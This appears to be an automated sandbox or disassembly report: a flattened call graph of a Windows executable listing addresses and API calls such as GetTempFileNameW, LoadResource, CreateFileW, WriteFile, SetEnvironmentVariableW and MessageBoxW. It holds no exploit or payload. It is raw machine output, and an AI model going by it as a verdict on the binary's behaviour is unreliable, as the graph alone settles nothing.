8460->8461 8462 401a9d 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401aa9 8463->8464 8465 40a7e7 2 API calls 8464->8465 8466 401ab4 8465->8466 8467 40a6c5 3 API calls 8466->8467 8468 401abf GetTempFileNameW PathAddBackslashW 8467->8468 9372 40de80 GetLastError TlsGetValue SetLastError 8468->9372 8470 401aea 9373 40de80 GetLastError TlsGetValue SetLastError 8470->9373 8472 401af2 8473 409bc0 4 API calls 8472->8473 8474 401afd 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401b09 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401b14 PathRenameExtensionW GetTempFileNameW 8477->8478 9374 40de80 GetLastError TlsGetValue SetLastError 8478->9374 8480 401b43 9375 40de80 GetLastError TlsGetValue SetLastError 8480->9375 8482 401b4b 8483 409bc0 4 API calls 8482->8483 8484 401b56 8483->8484 8485 40dec0 3 API calls 8484->8485 8486 401b62 8485->8486 9376 409b80 HeapFree 8486->9376 8488 401b6b 8489 40df50 HeapFree 8488->8489 8490 401b78 8489->8490 8491 40df50 HeapFree 8490->8491 8492 401b81 8491->8492 8493 40df50 HeapFree 8492->8493 8494 401b8a 8493->8494 8495 40460e 8494->8495 8496 40dfc0 21 API calls 8495->8496 8500 40461b 8496->8500 8497 40469c 9383 40de80 GetLastError TlsGetValue SetLastError 8497->9383 8498 40de80 GetLastError TlsGetValue SetLastError 8498->8500 8500->8497 8500->8498 8502 405dc0 3 API calls 8500->8502 8511 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8500->8511 8514 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8500->8514 8501 4046a2 8503 40358d 98 API calls 8501->8503 8502->8500 8504 4046b8 8503->8504 8505 40dec0 3 API calls 8504->8505 8506 4046c2 8505->8506 9384 40a95a 8506->9384 8509 40df50 HeapFree 8510 4046d6 8509->8510 8512 40df50 HeapFree 8510->8512 8511->8500 8513 4046df 8512->8513 8515 40df50 HeapFree 8513->8515 8514->8500 8516 4043c2 8515->8516 8517 40de80 GetLastError TlsGetValue SetLastError 8516->8517 8517->7675 8519 40dfc0 21 API calls 8518->8519 8520 403597 8519->8520 8521 4051a0 3 API calls 8520->8521 8522 4035a0 8521->8522 8523 405060 2 API calls 8522->8523 8524 4035ac 8523->8524 8525 4035b7 8524->8525 8526 4035db 8524->8526 9389 40de80 GetLastError TlsGetValue SetLastError 8525->9389 8527 4035e5 8526->8527 8528 403608 8526->8528 9391 40de80 GetLastError TlsGetValue SetLastError 8527->9391 8531 403612 8528->8531 8532 40363b 8528->8532 9392 40de80 GetLastError TlsGetValue SetLastError 8531->9392 8535 403645 8532->8535 8536 40366e 8532->8536 8533 4035bd 9390 40de80 GetLastError TlsGetValue SetLastError 8533->9390 8534 4035f1 8541 40e020 4 API calls 8534->8541 9410 40de80 GetLastError TlsGetValue SetLastError 8535->9410 8539 4036a1 8536->8539 8540 403678 8536->8540 8548 4036d4 8539->8548 8549 4036ab 8539->8549 9412 40de80 GetLastError TlsGetValue SetLastError 8540->9412 8546 4035f9 8541->8546 8543 403618 9393 40de80 GetLastError TlsGetValue SetLastError 8543->9393 8544 4035c5 8551 40a7f5 5 API calls 8544->8551 8557 40dec0 3 API calls 8546->8557 8547 40364b 9411 40de80 GetLastError TlsGetValue SetLastError 8547->9411 8555 403707 8548->8555 8556 4036de 8548->8556 9414 40de80 GetLastError TlsGetValue SetLastError 8549->9414 8553 4035cc 8551->8553 8552 403620 9394 40a83a 8552->9394 8561 40dec0 3 API calls 8553->8561 8554 40367e 9413 40de80 GetLastError TlsGetValue SetLastError 8554->9413 8567 403711 8555->8567 8568 40373a 8555->8568 9416 40de80 GetLastError TlsGetValue SetLastError 8556->9416 8564 4035d6 8557->8564 8561->8564 9387 40de80 GetLastError TlsGetValue SetLastError 8564->9387 8565 403653 8574 40a83a 17 API calls 8565->8574 8566 4036b1 9415 40de80 GetLastError TlsGetValue SetLastError 8566->9415 9418 40de80 GetLastError TlsGetValue SetLastError 8567->9418 8572 403744 8568->8572 8573 40376d 8568->8573 8570 403686 8581 40a83a 17 API calls 8570->8581 8571 4036e4 9417 40de80 GetLastError TlsGetValue SetLastError 8571->9417 9420 40de80 GetLastError TlsGetValue SetLastError 8572->9420 8578 403777 8573->8578 8579 40379d 8573->8579 8585 40365f 8574->8585 8577 403717 9419 40de80 GetLastError TlsGetValue SetLastError 8577->9419 9422 40de80 GetLastError TlsGetValue SetLastError 8578->9422 8593 4037f5 8579->8593 8594 4037a7 8579->8594 8580 40dec0 3 API calls 8645 403636 8580->8645 8589 403692 8581->8589 8595 40dec0 3 API calls 8585->8595 8586 4036b9 8596 40a83a 17 API calls 8586->8596 8600 40dec0 3 API calls 8589->8600 8590 40381f 8601 40e020 4 API calls 8590->8601 8591 4036ec 8602 40a83a 17 API calls 8591->8602 8592 40374a 9421 40de80 GetLastError TlsGetValue SetLastError 8592->9421 9452 40de80 GetLastError TlsGetValue SetLastError 8593->9452 9424 40de80 GetLastError TlsGetValue SetLastError 8594->9424 8595->8645 8597 4036c5 8596->8597 8606 40dec0 3 API calls 8597->8606 8598 40371f 8607 40a83a 17 API calls 8598->8607 8599 40377d 9423 40de80 GetLastError TlsGetValue SetLastError 8599->9423 8600->8645 8609 403827 8601->8609 8610 4036f8 8602->8610 8606->8645 8615 40372b 8607->8615 9388 405170 TlsGetValue 8609->9388 8618 40dec0 3 API calls 8610->8618 8611 403752 8619 40a83a 17 API calls 8611->8619 8612 4037ad 9425 40de80 GetLastError TlsGetValue SetLastError 8612->9425 8613 4037fb 9453 40de80 GetLastError TlsGetValue SetLastError 8613->9453 8623 40dec0 3 API calls 8615->8623 8616 403785 8624 40a83a 17 API calls 8616->8624 8618->8645 8626 40375e 8619->8626 8621 4037b5 9426 409355 8621->9426 8622 403803 8628 40a7f5 5 API calls 8622->8628 8623->8645 8629 403791 8624->8629 8625 40382e 8631 40df50 HeapFree 8625->8631 8630 40dec0 3 API calls 8626->8630 8633 40380a 8628->8633 8634 40dec0 3 API calls 8629->8634 8630->8645 8635 403846 8631->8635 8637 40dec0 3 API calls 8633->8637 8634->8645 8638 40df50 HeapFree 8635->8638 8636 40dec0 3 API calls 8639 4037d0 8636->8639 8637->8564 8640 40384e 8638->8640 8641 4037e9 8639->8641 8642 4037dd 8639->8642 8640->7678 8644 401fa9 36 API calls 8641->8644 9449 405532 8642->9449 8644->8645 8645->8564 8646->7682 8647->7684 8649 40dfc0 21 API calls 8648->8649 8650 402c04 8649->8650 8651 4051a0 3 API calls 8650->8651 8652 402c0d 8651->8652 8653 405060 2 API calls 8652->8653 8654 402c19 8653->8654 8655 409ba0 RtlAllocateHeap 8654->8655 8656 402c23 GetShortPathNameW 8655->8656 9462 40de80 GetLastError TlsGetValue SetLastError 8656->9462 8658 402c3f 9463 40de80 GetLastError TlsGetValue SetLastError 8658->9463 8660 402c47 8661 409c10 5 API calls 8660->8661 8662 402c57 8661->8662 8663 40dec0 3 API calls 8662->8663 8664 402c61 8663->8664 9464 409b80 HeapFree 8664->9464 8666 402c6a 9465 40de80 GetLastError TlsGetValue SetLastError 8666->9465 8668 402c74 8669 40e020 4 API calls 8668->8669 8670 402c7c 8669->8670 9466 405170 TlsGetValue 8670->9466 8672 402c83 8673 40df50 HeapFree 8672->8673 8674 402c9a 8673->8674 8675 40df50 HeapFree 8674->8675 8676 402ca3 8675->8676 8677 40e080 TlsGetValue 8676->8677 8677->7688 8678->7690 8680 404434 8679->8680 8682 4098c7 SetEnvironmentVariableW 8679->8682 8680->7693 8682->8680 8683->7696 8684->7704 8686 40dfc0 21 API calls 8685->8686 8687 401e5f 8686->8687 8688 4051a0 3 API calls 8687->8688 8689 401e68 8688->8689 9467 40de80 GetLastError TlsGetValue SetLastError 8689->9467 8691 401e6e 9468 40de80 GetLastError TlsGetValue SetLastError 8691->9468 8693 401e76 8694 409698 7 API calls 8693->8694 8695 401e7d 8694->8695 8696 40dec0 3 API calls 8695->8696 8697 401e87 PathQuoteSpacesW 8696->8697 8698 401ee0 8697->8698 8699 401e97 8697->8699 9537 40de80 GetLastError TlsGetValue SetLastError 8698->9537 9471 40de80 GetLastError TlsGetValue SetLastError 8699->9471 8702 401e9d 9472 4024f1 8702->9472 8703 401ee9 8705 40e020 4 API calls 8703->8705 8707 401ef1 8705->8707 8709 40dec0 3 API calls 8707->8709 8708 40dec0 3 API calls 8710 401eae 8708->8710 8711 401ede 8709->8711 9536 40de80 GetLastError TlsGetValue SetLastError 8710->9536 9469 40de80 GetLastError TlsGetValue SetLastError 8711->9469 8714 401eb7 8716 40e020 4 API calls 8714->8716 8715 401f05 8717 40e020 4 API calls 8715->8717 8718 401ebf 8716->8718 8719 401f0d 8717->8719 8720 40e020 4 API calls 8718->8720 9470 405170 TlsGetValue 8719->9470 8722 401eca 8720->8722 8724 40e020 4 API calls 8722->8724 8723 401f14 8726 40df50 HeapFree 8723->8726 8725 401ed4 8724->8725 8727 40dec0 3 API calls 8725->8727 8728 401f2b 8726->8728 8727->8711 8729 40df50 HeapFree 8728->8729 8730 401f34 8729->8730 8730->7707 8732 40385b 8731->8732 8732->8732 8733 40dfc0 21 API calls 8732->8733 8751 40386d 8733->8751 8734 4038ee 9568 40de80 GetLastError TlsGetValue SetLastError 8734->9568 8736 4038f4 9569 40de80 GetLastError TlsGetValue SetLastError 8736->9569 8738 4038fc 9570 40de80 GetLastError TlsGetValue SetLastError 8738->9570 8739 405dc0 3 API calls 8739->8751 8741 403904 9571 40de80 GetLastError TlsGetValue SetLastError 8741->9571 8743 40390c 8745 40d100 8 API calls 8743->8745 8744 40de80 GetLastError TlsGetValue SetLastError 8744->8751 8746 40391e 8745->8746 9572 405182 TlsGetValue 8746->9572 8747 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8747->8751 8749 403923 8750 405eb0 6 API calls 8749->8750 8752 40392b 8750->8752 8751->8734 8751->8739 8751->8744 8751->8747 8753 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8751->8753 8754 40dec0 3 API calls 8752->8754 8753->8751 8755 403935 8754->8755 9573 40de80 GetLastError TlsGetValue SetLastError 8755->9573 8757 40393b 9574 40de80 GetLastError TlsGetValue SetLastError 8757->9574 8759 403943 9575 40de80 GetLastError TlsGetValue SetLastError 8759->9575 8761 40394b 9576 40de80 GetLastError TlsGetValue SetLastError 8761->9576 8763 403953 8764 40d100 8 API calls 8763->8764 8765 403965 8764->8765 9577 405182 TlsGetValue 8765->9577 8767 40396a 8768 405eb0 6 API calls 8767->8768 8769 403972 8768->8769 8770 40dec0 3 API calls 8769->8770 8771 40397c 8770->8771 9578 40de80 GetLastError TlsGetValue SetLastError 8771->9578 8773 403982 9579 40de80 GetLastError TlsGetValue SetLastError 8773->9579 8775 40398a 9580 40de80 GetLastError TlsGetValue SetLastError 8775->9580 8777 403992 9581 40de80 GetLastError TlsGetValue SetLastError 8777->9581 8779 40399a 8780 40d100 8 API calls 8779->8780 8781 4039aa 8780->8781 9582 405182 TlsGetValue 8781->9582 8783 4039af 8784 405eb0 6 API calls 8783->8784 8785 4039b7 8784->8785 8786 40dec0 3 API calls 8785->8786 8787 4039c1 8786->8787 9583 40de80 GetLastError TlsGetValue SetLastError 8787->9583 8789 4039c7 9584 40de80 GetLastError TlsGetValue SetLastError 8789->9584 8791 4039cf 9585 40de80 GetLastError TlsGetValue SetLastError 8791->9585 8793 4039d7 9586 40de80 GetLastError TlsGetValue SetLastError 8793->9586 8795 4039df 8796 40d100 8 API calls 8795->8796 8797 4039ef 8796->8797 9587 405182 TlsGetValue 8797->9587 8799 4039f4 8800 405eb0 6 API calls 8799->8800 8801 4039fc 8800->8801 8802 40dec0 3 API calls 8801->8802 8803 403a06 8802->8803 9588 40de80 GetLastError TlsGetValue SetLastError 8803->9588 8805 403a0c 9589 40de80 GetLastError TlsGetValue SetLastError 8805->9589 8807 403a14 9590 40de80 GetLastError TlsGetValue SetLastError 8807->9590 8809 403a1c 9591 40de80 GetLastError TlsGetValue SetLastError 8809->9591 8811 403a24 8812 40d100 8 API calls 8811->8812 8813 403a34 8812->8813 9592 405182 TlsGetValue 8813->9592 8815 403a39 8816 405eb0 6 API calls 8815->8816 8817 403a41 8816->8817 8818 40dec0 3 API calls 8817->8818 8819 403a4b 8818->8819 9593 40de80 GetLastError TlsGetValue SetLastError 8819->9593 8821 403a51 9594 403cd7 8821->9594 8824 4051a0 3 API calls 8825 403a66 8824->8825 9635 40de80 GetLastError TlsGetValue SetLastError 8825->9635 8827 403a6c 8828 403cd7 84 API calls 8827->8828 8829 403a7c 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a88 8830->8831 9636 40de80 GetLastError TlsGetValue SetLastError 8831->9636 8833 403a8e 8834 403cd7 84 API calls 8833->8834 8835 403a9e 8834->8835 8836 40dec0 3 API calls 8835->8836 8837 403aa8 8836->8837 9637 40de80 GetLastError TlsGetValue SetLastError 8837->9637 8839 403aae 8840 403cd7 84 API calls 8839->8840 8841 403abe 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403ac8 8842->8843 9638 40de80 GetLastError TlsGetValue SetLastError 8843->9638 8845 403ace 8846 403cd7 84 API calls 8845->8846 8847 403ade 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403ae8 8848->8849 9639 40de80 GetLastError TlsGetValue SetLastError 8849->9639 8851 403aee 9640 40de80 GetLastError TlsGetValue SetLastError 8851->9640 8853 403af6 9641 40de80 GetLastError TlsGetValue SetLastError 8853->9641 8855 403afe 8856 402bfa 43 API calls 8855->8856 8857 403b0b 8856->8857 9642 40e080 TlsGetValue 8857->9642 8859 403b10 9643 405182 TlsGetValue 8859->9643 8861 403b1f 9644 406650 8861->9644 8864 40dec0 3 API calls 8865 403b32 8864->8865 9647 40de80 GetLastError TlsGetValue SetLastError 8865->9647 8867 403b38 9648 40de80 GetLastError TlsGetValue SetLastError 8867->9648 8869 403b40 9649 40de80 GetLastError TlsGetValue SetLastError 8869->9649 8871 403b48 8872 402bfa 43 API calls 8871->8872 8873 403b55 8872->8873 9650 40e080 TlsGetValue 8873->9650 8875 403b5a 9651 405182 TlsGetValue 8875->9651 8877 403b69 8878 406650 13 API calls 8877->8878 8879 403b72 8878->8879 8880 40dec0 3 API calls 8879->8880 8881 403b7c 8880->8881 9652 40de80 GetLastError TlsGetValue SetLastError 8881->9652 8883 403b82 9653 40de80 GetLastError TlsGetValue SetLastError 8883->9653 8885 403b8e 8886 40e020 4 API calls 8885->8886 8887 403b96 8886->8887 8888 40e020 4 API calls 8887->8888 8889 403ba1 8888->8889 8890 40e020 4 API calls 8889->8890 8891 403bab 8890->8891 8892 40e020 4 API calls 8891->8892 8893 403bb5 8892->8893 8894 40e020 4 API calls 8893->8894 8895 403bbf 8894->8895 9654 40e080 TlsGetValue 8895->9654 8897 403bc4 9655 405182 TlsGetValue 8897->9655 8899 403bcf 9656 40240c 8899->9656 8902 4051a0 3 API calls 8903 403bdd 8902->8903 8904 40df50 HeapFree 8903->8904 8905 403be8 8904->8905 8906 40df50 HeapFree 8905->8906 8907 403bf1 8906->8907 8908 40df50 HeapFree 8907->8908 8909 403bfa 8908->8909 8910 40df50 HeapFree 8909->8910 8911 403c03 8910->8911 8912 40df50 HeapFree 8911->8912 8913 403c0c 8912->8913 8914 40df50 HeapFree 8913->8914 8915 403c15 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403c1e 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403c27 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403c30 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c39 8922->8923 8924 40de80 GetLastError TlsGetValue SetLastError 8923->8924 8924->7712 8925->7718 8926->7734 8979 4054b7 EnterCriticalSection 8978->8979 8980 404502 8978->8980 8985 4054cd 8979->8985 8987 4054fd 8979->8987 8980->7731 8981 40db72 HeapAlloc 8983 405517 LeaveCriticalSection 8981->8983 8982 4054ce WaitForSingleObject 8984 4054de CloseHandle 8982->8984 8982->8985 8983->8980 8985->8982 8985->8987 8987->8981 8989 40dfc0 21 API calls 8988->8989 8990 402cb7 8989->8990 8991 405060 2 API calls 8990->8991 8993 402cc3 8991->8993 9103 40e0e0 9053->9103 9057 402bc7 9056->9057 9057->9057 9058 40dfc0 21 API calls 9057->9058 9059 402bd9 GetNativeSystemInfo 9058->9059 9060 402bec 9059->9060 9060->8203 9060->8204 9061->8230 9062->8237 9064 4055c8 9063->9064 9068 4032bd 9063->9068 9064->9068 9109 405553 memset GetModuleHandleW 9064->9109 9067 405606 GetVersionExW 9067->9068 9068->8204 9069->8212 9070->8216 9072 40e260 3 API calls 9071->9072 9073 4032ef 9072->9073 9073->8222 9074->8227 9075->8243 9076->8258 9112 40d498 EnterCriticalSection 9077->9112 9079 40add5 9080 40ae6e 9079->9080 9081 40addf CreateFileW 9079->9081 9080->8269 9082 40ae00 9081->9082 9083 40ae20 9081->9083 9082->9083 9085 40ae0d HeapAlloc 9082->9085 9086 40ae65 9083->9086 9122 40d40a EnterCriticalSection 9083->9122 9085->9083 9086->8269 9088 40a9e9 9087->9088 9089 40a9da 9087->9089 9133 40d459 EnterCriticalSection 9088->9133 9137 40d9f5 9089->9137 9094 40aa2d 9094->8270 9095 40aa19 CloseHandle 9097 40d40a 4 API calls 9095->9097 9097->9094 9098 40aa08 HeapFree 9098->9095 9099->8277 9100->8279 9101->8211 9102->8215 9104 4032a2 9103->9104 9105 40e0ea wcslen HeapAlloc 9103->9105 9104->8199 9107 40e3a0 9105->9107 9108 40e3b0 9107->9108 9108->9104 9110 40558b 9109->9110 9111 40557b GetProcAddress 9109->9111 9110->9067 9110->9068 9111->9110 9113 40d4b2 9112->9113 9114 40d4c7 9112->9114 9115 40db72 HeapAlloc 9113->9115 9116 40d4ec 9114->9116 9117 40d4cc HeapReAlloc 9114->9117 9118 40d4c1 9115->9118 9119 40d501 HeapAlloc 9116->9119 9120 40d4f5 9116->9120 9117->9116 9121 40d51d LeaveCriticalSection 9118->9121 9119->9120 9120->9121 9121->9079 9123 40d441 9122->9123 9124 40d422 9122->9124 9130 40db32 9123->9130 9124->9123 9126 40d427 9124->9126 9127 40d430 memset 9126->9127 9128 40d44d LeaveCriticalSection 9126->9128 9127->9128 9128->9086 9129 40d44b 9129->9128 9131 40db43 HeapFree 9130->9131 9131->9129 9134 40d472 9133->9134 9135 40d47d LeaveCriticalSection 9133->9135 9134->9135 9136 40a9f6 9135->9136 9136->9094 9136->9095 9143 40aa40 9136->9143 9138 40da02 9137->9138 9139 40a9e5 9137->9139 9146 40db1b EnterCriticalSection 9138->9146 9139->8270 9142 40da08 9142->9139 9147 40dac4 9142->9147 9144 40aa54 WriteFile 9143->9144 9145 40aa7c 9143->9145 9144->9098 9145->9098 9146->9142 9149 40dad0 9147->9149 9148 40db14 9148->9142 9149->9148 9150 40db0a LeaveCriticalSection 9149->9150 9150->9148 9152 409ba8 RtlAllocateHeap 9151->9152 9153 409bba 9151->9153 9152->8303 9153->8303 9168 40e7e0 9154->9168 9156 402f24 9156->8308 9158 40dfc0 21 API calls 9157->9158 9159 4026c1 LoadResource SizeofResource 9158->9159 9160 409ba0 RtlAllocateHeap 9159->9160 9161 4026ee 9160->9161 9187 409c80 memcpy 9161->9187 9163 402705 FreeResource 9164 402715 9163->9164 9165 4046ef 9164->9165 9188 409b60 9165->9188 9167 4046f8 9167->8306 9169 40e7f8 __fprintf_l 9168->9169 9171 40e8aa __fprintf_l 9169->9171 9172 40e950 9169->9172 9171->9156 9173 40f3b2 9172->9173 9177 40e960 __fprintf_l 9172->9177 9173->9169 9174 40ef37 9178 40efa4 __fprintf_l 9174->9178 9179 4104f0 9174->9179 9176 40ee4f memcpy 9176->9177 9177->9173 9177->9174 9177->9176 9178->9169 9180 410504 9179->9180 9181 410572 memcpy 9180->9181 9182 41054c memcpy 9180->9182 9184 41051f 9180->9184 9185 410599 memcpy 9181->9185 9186 4105b8 9181->9186 9182->9178 9184->9178 9185->9178 9186->9178 9187->9163 9189 409b68 HeapSize 9188->9189 9190 409b7a 9188->9190 9189->9167 9190->9167 9191->8321 9192->8329 9193->8320 9194->8324 9195->8328 9196->8332 9198 409c29 9197->9198 9199 409c19 9197->9199 9200 40e260 3 API calls 9198->9200 9299 409bc0 9199->9299 9203 409c3f 9200->9203 9305 40e3f0 TlsGetValue 9203->9305 9205 409c68 9205->8336 9206->8340 9306 405f90 9207->9306 9209 402211 9209->8345 9210->8349 9211->8351 9212->8353 9213->8355 9214->8359 9215->8365 9216->8367 9217->8369 9218->8371 9220 40590f 9219->9220 9227 405801 9219->9227 9316 40e340 TlsGetValue 9220->9316 9222 405918 9222->8373 9223 405886 9225 40e1e0 TlsGetValue 9223->9225 9224 405850 wcsncmp 9224->9227 9226 4058c7 9225->9226 9228 4058e9 9226->9228 9315 40e230 TlsGetValue 9226->9315 9227->9223 9227->9224 9229 40e260 3 API calls 9228->9229 9231 4058f0 9229->9231 9233 405901 9231->9233 9234 4058f6 wcsncpy 9231->9234 9232 4058d7 memmove 9232->9228 9233->8373 9234->9233 9235->8375 9236->8377 9237->8379 9238->8383 9239->8385 9317 408e58 9240->9317 9242 408f81 9243 408e58 3 API calls 9242->9243 9244 408f90 9243->9244 9245 408e58 3 API calls 9244->9245 9246 408fa3 9245->9246 9247 408fb0 GetStockObject 9246->9247 9248 408fbd LoadIconW LoadCursorW RegisterClassExW 9246->9248 9247->9248 9321 4094d1 GetForegroundWindow 9248->9321 9253 409047 IsWindowEnabled 9254 40906b 9253->9254 9255 409052 EnableWindow 9253->9255 9256 4094d1 3 API calls 9254->9256 9255->9254 9257 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9256->9257 9258 4092ba 9257->9258 9259 4090cb SetWindowLongW CreateWindowExW SendMessageW 9257->9259 9260 4092cd 9258->9260 9335 40e340 TlsGetValue 9258->9335 9261 409125 9259->9261 9262 409128 CreateWindowExW SendMessageW SetFocus 9259->9262 9336 408e9a 9260->9336 9261->9262 9264 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9262->9264 9265 40917b SendMessageW wcslen wcslen SendMessageW 9262->9265 9268 40926a 9264->9268 9265->9264 9270 409273 9268->9270 9271 40922e GetMessageW 9268->9271 9269 408e9a HeapFree 9272 4092df 9269->9272 9274 409277 DestroyAcceleratorTable 9270->9274 9275 40927e 9270->9275 9271->9270 9273 409243 TranslateAcceleratorW 9271->9273 9276 408e9a HeapFree 9272->9276 9273->9268 9277 409254 TranslateMessage DispatchMessageW 9273->9277 9274->9275 9275->9258 9278 409285 wcslen 9275->9278 9279 4022e5 9276->9279 9277->9268 9280 40e260 3 API calls 9278->9280 9279->8388 9281 40929c wcscpy HeapFree 9280->9281 9281->9258 9282->8394 9283->8396 9284->8398 9285->8400 9286->8404 9287->8411 9288->8413 9289->8415 9290->8419 9291->8421 9293 4094d1 3 API calls 9292->9293 9294 408e2d 9293->9294 9295 409588 16 API calls 9294->9295 9296 408e36 MessageBoxW 9295->9296 9297 409588 16 API calls 9296->9297 9298 40239f 9297->9298 9298->8424 9300 409bcd 9299->9300 9301 40e260 3 API calls 9300->9301 9302 409beb 9301->9302 9303 409bf1 memcpy 9302->9303 9304 409bff 9302->9304 9303->9304 9304->8336 9305->9205 9309 405fa1 9306->9309 9307 40e1e0 TlsGetValue 9308 406014 9307->9308 9310 40e260 3 API calls 9308->9310 9309->9307 9309->9309 9311 406022 9310->9311 9313 406032 9311->9313 9314 40e370 TlsGetValue 9311->9314 9313->9209 9314->9313 9315->9232 9316->9222 9318 408e60 wcslen HeapAlloc 9317->9318 9319 408e96 9317->9319 9318->9319 9320 408e86 wcscpy 9318->9320 9319->9242 9320->9242 9322 409032 9321->9322 9323 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9321->9323 9324 409588 9322->9324 9323->9322 9325 409592 EnumWindows 9324->9325 9330 4095dd 9324->9330 9326 40903e 9325->9326 9327 4095af 9325->9327 9339 409507 GetWindowThreadProcessId GetCurrentThreadId 9325->9339 9326->9253 9326->9254 9327->9326 9329 4095b1 GetCurrentThreadId 9327->9329 9332 4095c4 SetWindowPos 9327->9332 9328 4095ea GetCurrentThreadId 9328->9330 9329->9327 9330->9326 9330->9328 9331 409600 EnableWindow 9330->9331 9333 409611 SetWindowPos 9330->9333 9334 40db32 HeapFree 9330->9334 9331->9330 9332->9327 9333->9330 9334->9330 9335->9260 9337 408ea1 HeapFree 9336->9337 9338 408eb3 9336->9338 9337->9338 9338->9269 9340 409525 IsWindowVisible 9339->9340 9341 40957f 9339->9341 9340->9341 9342 409530 9340->9342 9343 40db72 HeapAlloc 9342->9343 9344 40953c GetCurrentThreadId GetWindowLongW 9343->9344 9345 40955a 9344->9345 9346 40955e GetForegroundWindow 9344->9346 9345->9346 9346->9341 9347 409568 IsWindowEnabled 9346->9347 9347->9341 9348 409573 EnableWindow 9347->9348 9348->9341 9349->8435 9350->8438 9352 40e260 3 API calls 9351->9352 9353 40a769 GetTempPathW LoadLibraryW 9352->9353 9354 40a7a4 9353->9354 9355 40a786 GetProcAddress 9353->9355 9377 40e3f0 TlsGetValue 9354->9377 9356 40a796 GetLongPathNameW 9355->9356 9357 40a79d FreeLibrary 9355->9357 9356->9357 9357->9354 9359 401a0d 9359->8441 9360->8445 9361->8447 9378 40a7b9 9362->9378 9365 40a6c5 9366 40a6d4 wcsncpy wcslen 9365->9366 9367 401a6a GetTempFileNameW 9365->9367 9368 40a708 CreateDirectoryW 9366->9368 9370 40de80 GetLastError TlsGetValue SetLastError 9367->9370 9368->9367 9370->8458 9371->8460 9372->8470 9373->8472 9374->8480 9375->8482 9376->8488 9377->9359 9379 40a7c0 9378->9379 9380 401a5f 9378->9380 9381 40a7d6 DeleteFileW 9379->9381 9382 40a7c7 SetFileAttributesW 9379->9382 9380->9365 9381->9380 9382->9381 9383->8501 9385 40a961 SetCurrentDirectoryW 9384->9385 9386 4046cb 9384->9386 9385->9386 9386->8509 9387->8590 9388->8625 9389->8533 9390->8544 9391->8534 9392->8543 9393->8552 9395 40e260 3 API calls 9394->9395 9396 40a84f 9395->9396 9397 40a85e LoadLibraryW 9396->9397 9403 40a8e9 9396->9403 9398 40a8cb 9397->9398 9399 40a86f GetProcAddress 9397->9399 9454 40a96c SHGetFolderLocation 9398->9454 9400 40a8c0 FreeLibrary 9399->9400 9407 40a884 9399->9407 9400->9398 9408 40a91b 9400->9408 9404 40a96c 4 API calls 9403->9404 9403->9408 9404->9408 9405 40362c 9405->8580 9407->9400 9409 40a896 wcscpy wcscat wcslen CoTaskMemFree 9407->9409 9460 40e3f0 TlsGetValue 9408->9460 9409->9400 9410->8547 9411->8565 9412->8554 9413->8570 9414->8566 9415->8586 9416->8571 9417->8591 9418->8577 9419->8598 9420->8592 9421->8611 9422->8599 9423->8616 9424->8612 9425->8621 9427 409368 CoInitialize 9426->9427 9428 409379 memset LoadLibraryW 9426->9428 9427->9428 9429 4093a3 GetProcAddress GetProcAddress 9428->9429 9430 4094ab 9428->9430 9431 4093d2 wcsncpy wcslen 9429->9431 9432 4093cd 9429->9432 9433 40e260 3 API calls 9430->9433 9434 409401 9431->9434 9432->9431 9435 4094b8 9433->9435 9436 4094d1 3 API calls 9434->9436 9461 40e3f0 TlsGetValue 9435->9461 9437 40941f 9436->9437 9439 409588 16 API calls 9437->9439 9441 409442 9439->9441 9440 4037c6 9440->8636 9442 409588 16 API calls 9441->9442 9443 409457 9442->9443 9444 40949f FreeLibrary 9443->9444 9445 40e260 3 API calls 9443->9445 9444->9430 9444->9435 9446 409468 CoTaskMemFree wcslen 9445->9446 9446->9444 9448 409493 9446->9448 9448->9444 9450 40553b timeBeginPeriod 9449->9450 9451 40554d Sleep 9449->9451 9450->9451 9452->8613 9453->8622 9455 40a98b SHGetPathFromIDListW 9454->9455 9456 40a8d3 wcscat wcslen 9454->9456 9457 40a9b5 CoTaskMemFree 9455->9457 9458 40a999 wcslen 9455->9458 9456->9408 9457->9456 9458->9457 9459 40a9a6 9458->9459 9459->9457 9460->9405 9461->9440 9462->8658 9463->8660 9464->8666 9465->8668 9466->8672 9467->8691 9468->8693 9469->8715 9470->8723 9471->8702 9473 4024f7 9472->9473 9473->9473 9474 40dfc0 21 API calls 9473->9474 9475 402509 9474->9475 9476 4051a0 3 API calls 9475->9476 9495 402512 9476->9495 9477 402593 9538 40de80 GetLastError TlsGetValue SetLastError 9477->9538 9479 402599 9539 40de80 GetLastError TlsGetValue SetLastError 9479->9539 9481 4025a1 GetCommandLineW 9483 409bc0 4 API calls 9481->9483 9482 405dc0 3 API calls 9482->9495 9484 4025ae 9483->9484 9486 40dec0 3 API calls 9484->9486 9485 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9485->9495 9487 4025b8 9486->9487 9540 40de80 GetLastError TlsGetValue SetLastError 9487->9540 9488 40de80 GetLastError TlsGetValue SetLastError 9488->9495 9490 4025c2 9491 40e020 4 API calls 9490->9491 9492 4025ca 9491->9492 9493 40dec0 3 API calls 9492->9493 9496 4025d4 PathRemoveArgsW 9493->9496 9494 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9494->9495 9495->9477 9495->9482 9495->9485 9495->9488 9495->9494 9497 4025eb 9496->9497 9498 402651 9497->9498 9541 40de80 GetLastError TlsGetValue SetLastError 9497->9541 9500 4098c0 SetEnvironmentVariableW 9498->9500 9502 40265e 9500->9502 9501 4025fd 9503 40e020 4 API calls 9501->9503 9554 40de80 GetLastError TlsGetValue SetLastError 9502->9554 9505 40260a 9503->9505 9542 40de80 GetLastError TlsGetValue SetLastError 9505->9542 9506 402668 9508 40e020 4 API calls 9506->9508 9510 402670 